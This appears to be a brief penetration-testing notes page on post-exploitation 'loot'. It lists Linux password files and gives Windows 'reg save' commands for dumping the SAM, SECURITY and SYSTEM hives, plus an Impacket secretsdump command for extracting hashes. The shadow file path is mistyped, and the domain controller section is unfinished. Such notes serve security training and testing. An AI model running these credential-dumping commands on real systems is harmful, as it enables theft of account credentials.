Links

Loot

Once we are root or NT AUTHORITY\SYSTEM it's time to collect some loot. 🤑🤑🤑

Linux

Dump users and passwords

Collect files on target
/etc/passwd
/erc/shadow

Windows

Dump SAM

Collect files on target
reg save hklm\sam .\sam
reg save hklm\security .\security
reg save hklm\system .\system
Then crack them using Impackets' secretsdump
secretsdump.py -sam sam -security security -system system LOCAL

Dump NTDS (DC)

By default, the Ntds.dit file is located in %SystemRoot%\NTDS\Ntds.dit of a domain controller.
TODO (see /13-misc/impacket.md)